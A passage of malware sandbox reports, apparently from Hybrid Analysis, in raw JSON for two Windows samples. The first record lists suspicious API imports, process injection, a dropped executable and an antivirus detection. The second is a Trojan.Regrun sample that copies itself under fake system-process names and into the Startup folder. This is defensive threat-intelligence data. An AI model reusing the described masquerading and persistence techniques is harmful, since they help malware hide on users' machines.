\"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "Potential IP \"<IPv4>\" found in string \"HOST: <IPv4>:1900\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"GET %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found string \"M-SEARCH * HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.162764061012657", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Dropped file has high entropy (likely encrypted/compressed content)\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetSecurityDescriptorDacl\" (Indicator: \"SetSecurityDescriptorDacl\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"AddAccessAllowedAce\" (Indicator: \"AddAccessAllowedAce\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"InitializeSecurityDescriptor\" (Indicator: \"InitializeSecurityDescriptor\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetLengthSid\" (Indicator: \"GetLengthSid\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetSecurityDescriptorOwner\" (Indicator: \"SetSecurityDescriptorOwner\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetSecurityDescriptorGroup\" (Indicator: \"SetSecurityDescriptorGroup\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetSecurityDescriptorSacl\" (Indicator: \"SetSecurityDescriptorSacl\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetSecurityDescriptorSacl\" (Indicator: \"SetSecurityDescriptorSacl\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SetSecurityDescriptorGroup\" (Indicator: \"SetSecurityDescriptorGroup\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SetSecurityDescriptorOwner\" (Indicator: \"SetSecurityDescriptorOwner\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SetSecurityDescriptorDacl\" (Indicator: \"SetSecurityDescriptorDacl\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"InitializeSecurityDescriptor\" (Indicator: \"InitializeSecurityDescriptor\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"AddAccessAllowedAce\" (Indicator: \"AddAccessAllowedAce\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetLengthSid\" (Indicator: \"GetLengthSid\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \":\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"CorExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-87", "relevance": 1, "name": "Imports system security related APIs", "description": "Observed import api \"AddAccessAllowedAce\" which can \"Adds an access-allowed access control entry (ACE) to an access control list (ACL)\" [Source: gegdsimsogm.exe]\n Observed import api \"GetLengthSid\" which can \"Returns the length in bytes of a valid security identifier (SID)\" [Source: gegdsimsogm.exe]\n Observed import api \"GetTokenInformation\" which can \"Retrieves a specified type of information about an access token\" [Source: gegdsimsogm.exe]\n Observed import api \"InitializeAcl\" which can \"Initializes a new ACL structure\" [Source: gegdsimsogm.exe]\n Observed import api \"InitializeSecurityDescriptor\" which can \"Initializes a new security descriptor\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorDacl\" which can \"Sets information in a discretionary access control list (DACL)\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorGroup\" which can \"Sets the primary group information of an absolute-format security descriptor replacing any primary group information already present in the security descriptor\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorOwner\" which can \"Sets the owner information of an absolute-format security descriptor\" [Source: gegdsimsogm.exe]\n Observed import api \"SetSecurityDescriptorSacl\" which can \"Sets information in a system access control list (SACL)\" [Source: gegdsimsogm.exe]", "origin": "Static Parser", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeShutdownPrivilege\" (Indicator: \"SeShutdownPrivilege\"; Source: \"00000000-00000336.00000000.74072.002C0000.00000004.mdmp, 00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\n Observed string: \"shutdown -r\" (Indicator: \"shutdown \") in Source: 00000000-00000336.00000000.74072.0042A000.00000002.mdmp\n Observed string: \"Shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00000336.00000000.74072.0042A000.00000002.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" has resource with unusual entropy \"RT_ICON:7.98500152858\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "CreateToolhelp32Snapshot\n GetSystemInfo\n GetFileAttributesA\n VirtualProtect\n GetVersionExA\n GetModuleFileNameA\n LoadLibraryA\n Process32Next\n Process32First\n UnhandledExceptionFilter\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n GetModuleHandleA\n WriteFile\n GetStartupInfoA\n GetComputerNameA\n TerminateProcess\n Sleep\n CreateFileA\n GetTickCount\n VirtualAlloc\n ShellExecuteA\n SetSecurityDescriptorDacl\n ChangeServiceConfigA\n GetUserNameA\n GetDriveTypeA\n CopyFileA\n CreateThread\n GetSystemDirectoryA\n ExitThread\n GetFileSize\n CreateDirectoryA\n DeleteFileA\n FindFirstFileA\n FindNextFileA\n LockResource\n CreateProcessA\n FindResourceA\n GetWindowThreadProcessId\n GetCursorPos\n recv\n send\n accept\n sendto\n closesocket", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00005952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-96860 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-125263832 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-125513077 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-125840288 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-126121472 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-126416755 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-126634913 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-127445192 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-127694309 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-127931758 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-128167995 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-128426717 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-128645122 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-128876926 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-129099300 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-129381099 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-129751009 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-129976504 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-130237636 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-130467713 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-130696500 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-130951460 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-131187820 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-131411062 [PID: 5952]\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" queried SystemProcessInformation at 00000000-00005952-00000105-131670893 [PID: 5952]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" has section name .text with entropy \"6.06418869054\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" has section name .data with entropy \"7.99056036536\"\n \"gegdsimsogm.exe\" has section name .text with entropy \"6.58246664724\"\n \"gegdsimsogm.exe\" has section name .data with entropy \"7.739160394\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"PING\" (Indicator: \"ping\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%TEMP%\\gegdsimsogm.exe\" has high entropy 7.25589233782372", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 708)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 708)\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\" (Handle: 708)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96
https://hybrid-analysis.com/sample/946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "av_detect": 94, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 158, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163903, "sha256": "267d7bf8963647624eed7df1467538f3a7f166ab207964c2c3853ff597f19c75", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\CSRSS.EXE", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%LOCALAPPDATA%\\D3_08.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%LOCALAPPDATA%\\IExplorer.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\LSASS.EXE", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\SERVICES.EXE", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\SMSS.EXE", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163903, "sha256": "a9f5abcaab4643d0de91a98215a6f7b8e05e9c3c90713dd2737dcbfbc4e1c6b1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163903, "sha256": "c67dd75d8f7a2bdee403d022667a803b0ac030d152bcd72af0a19f85f201d8c3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163903, "sha256": "632a03a2c7faa9a56c371aafe276fe9dbb17ebe52a8599e2965830803345fd93", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163903, "sha256": "d064fa5ec82f4d1d7698c19212592fdaa2b50efa8e857fc8e5db10c4991e9b0b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163903, "sha256": "f7c9a891df63fd240296dc31f1381d46cb437cb0e083155d3b6a5189eb0325ef", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINLOGON.EXE", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_path": "%LOCALAPPDATA%\\csrss.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe (PID: 5136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_path": "%LOCALAPPDATA%\\lsass.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe (PID: 5136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_path": "%LOCALAPPDATA%\\services.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe (PID: 5136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_path": 